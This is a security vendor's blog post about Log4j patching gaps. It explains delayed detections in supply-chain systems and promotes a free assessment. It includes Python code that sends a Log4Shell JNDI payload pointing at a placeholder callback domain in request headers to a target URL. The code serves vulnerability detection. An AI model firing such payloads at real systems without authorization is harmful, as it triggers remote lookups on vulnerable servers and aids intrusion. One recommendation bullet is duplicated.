LoNg4j Findings Confirm Log4j Vulnerability Patching Gaps

December 6, 2022 | by Jason Kent


Roughly a year ago, IT and application security teams experienced a dark time. We found out that our logging systems were vulnerable to a specific attack that allowed an attacker to gain shell access. This vulnerability was particularly bad because the system didn't have to be publicly exposed to be exploited. What made it even more significant was that it impacted infrastructure components that are always plugged into the web but often aren't thought about. The vulnerable component was Log4j, and the exploit is what we now know as Log4Shell. Today, I still hear horror stories of all-night scrambles to get a scanner running and find all the instances.

To help our customers find all the vulnerable instances, we added a Log4j detection capability to API Spyder. Any inbound DNS requests API Spyder received were time-stamped as an added data point. API Spyder was finding Log4j instances for our customers, and they were patching them as quickly as they were found. First 12 were found, then 10, then 8, then 12 again… wait, what? It seemed something was going on. The fluctuation in Log4j instances found was not a bug – it turned out to be something we call LoNg4j.

LoNg4j Explained

LoNg4j instances are Log4j vulnerabilities found upstream in your digital supply chain, demonstrating just how connected our systems really are. One of the API Spyder detection techniques inserts a vulnerability test payload into a request header. When the initial tests were run, the transactions were logged and the results came back negative – no Log4j. Later, those logs were compiled, processed, or parsed by an additional system that is itself vulnerable, and that system's delayed callback told API Spyder that Log4j is present.
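To make the delayed-callback idea concrete, here is a minimal sketch of that style of detection. It is not API Spyder's actual implementation; the callback domain (oob.example.com), the header set, and the helper names are assumptions chosen purely for illustration.

```python
import time
import uuid

import requests  # third-party: pip install requests

# Hypothetical out-of-band DNS listener you control.
CALLBACK_DOMAIN = "oob.example.com"


def send_log4shell_probe(target_url: str) -> dict:
    """Send one probe with a unique token embedded in a JNDI lookup string.

    If any system in the target's digital supply chain later parses this value
    with a vulnerable Log4j version, the token shows up as a DNS query to
    CALLBACK_DOMAIN, possibly hours or days after this request returns.
    """
    token = uuid.uuid4().hex[:12]
    payload = f"${{jndi:ldap://{token}.{CALLBACK_DOMAIN}/a}}"
    headers = {
        # Headers that commonly end up in log statements.
        "User-Agent": payload,
        "X-Api-Version": payload,
        "Referer": payload,
    }
    resp = requests.get(target_url, headers=headers, timeout=10)
    return {
        "token": token,
        "target": target_url,
        "sent_at": time.time(),
        "status": resp.status_code,
    }


def correlate_callbacks(probes: list[dict], dns_queries: list[dict]) -> list[dict]:
    """Match later DNS callbacks (token, timestamp) against the probes we sent.

    A long delay between 'sent_at' and the callback suggests the vulnerable
    component sits upstream in the supply chain (a LoNg4j-style finding)
    rather than in the target itself.
    """
    by_token = {p["token"]: p for p in probes}
    hits = []
    for q in dns_queries:
        probe = by_token.get(q["token"])
        if probe:
            hits.append({
                **probe,
                "callback_at": q["timestamp"],
                "delay_seconds": q["timestamp"] - probe["sent_at"],
            })
    return hits
```

The key point the sketch illustrates is the time-stamping: the probe and the callback are correlated by token, so a "negative" result at test time can still turn into a positive finding when an upstream log processor touches the payload later.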

While the news cycles around Log4j have come and gone, the vulnerability still exists. As I sit here writing this, almost a year later, our team still sees API Spyder light up with detections across our customers and prospects. In some cases, the vulnerability resides in an organization we are not engaged with yet, resulting in a responsible disclosure submission.


Initial Responses to Log4j and Log4Shell Discoveries: Denial

When informed that an organization may have a vulnerability, the initial response often comes in the form of "let me see exactly how you did this." We often get requests that challenge the validity of our claims, so we have processes in place to ensure we aren't crying wolf. The next response is usually "we have already patched this in all of our systems," followed by "tell us how you found this." Digging through the API Spyder data repository, I can pull out the requests and responses to illustrate how the LoNg4j instances were found. In the most recent case, our tests were generating returns from one of the organization's vendor systems that performs an orchestration function. Denial here might be partially accurate: your systems aren't impacted, but your digital supply chain may be.

This pattern of doubt or denial is common when an organization is made aware of a potential vulnerability via a responsible disclosure. If someone tries to inform you that they have found a vulnerability in your app or website, be willing to believe it. A responsible disclosure notification is done with the intent of helping. There are further steps many organizations go through on this journey, but that first step of acceptance is the hardest to get over. I am not sure why.

Vulnerability management is very difficult to execute properly. It's a significant resource drain, requiring massive amounts of coordination to apply even the simplest of patches. The initial patches and deployments are often flawed or must be applied again, and that assumes you know which systems need patching. Then what happens when the patch breaks something else? When you consider the number of servers and resources in a large organization, you can understand why it is so hard. Keep in mind, though, that responding to an attacker getting shell on one of your servers with a very small script is even harder than vulnerability management. Once an attacker has access, the average time they spend on a system is over 180 days, and that assumes you find them and kick them out.

Staying Ahead of Log4j and LoNg4j

The widespread use of Log4j and the vast library of internal and 3rd-party servers that organizations have deployed mean that the vulnerability will be with us for years to come. Confirming this assertion, in the last six months API Spyder has found over 4,000 instances of Log4j and LoNg4j in the wild. Many of these detections have been in 3rd-party systems or buried deep in our customers' supply chains. My recommendation to our customers is to remain vigilant, regardless of how successful your patching efforts may appear to be.

  • Understand your exposure: Use API testing and penetration tools to fully understand your public-facing threat footprint and what your adversaries see.
  • Expand testing parameters: Include potential 3rd-party and digital supply chain targets in your testing efforts.
  • Exercise patience: Lengthen testing timeframes to as long as 24 hours to accommodate supply chain traversal that incorporates log analysis or event correlation (a short sketch follows this list).
  • Track inventory and assess risks: Use visibility gained during initial analysis for continuous inventory tracking, API risk assessment and threat detection.
  • Track inventory and assess risks: Use visibility gained during initial analysis for continuous inventory tracking, API risk assessment and threat detection.
  • Remediate and mitigate: Patch discovered vulnerabilities quickly, block threats in real-time to prevent data loss and business disruption.
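
Building on the probe sketch earlier in this post, the "exercise patience" recommendation amounts to keeping the correlation window open long enough for batch log processing upstream to run. The 24-hour value and the helper below are illustrative assumptions, not API Spyder settings.

```python
from datetime import timedelta

# Hypothetical correlation window: a DNS callback arriving as much as 24 hours
# after the probe was sent is still attributed to that probe, allowing for
# upstream batch log processing and event correlation in the supply chain.
CORRELATION_WINDOW = timedelta(hours=24)


def within_window(sent_at: float, callback_at: float) -> bool:
    """True if a callback arrived within the extended correlation window."""
    delay = callback_at - sent_at
    return 0 <= delay <= CORRELATION_WINDOW.total_seconds()
```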

Log4j, LoNg4j and Log4Shell will not disappear anytime soon, making it imperative that all organizations are aware of the risks and are fully prepared.

Confirm your Log4j and LoNg4j patching efforts are complete with a free API Spyder assessment.

Author

Jason Kent

Hacker in Residence
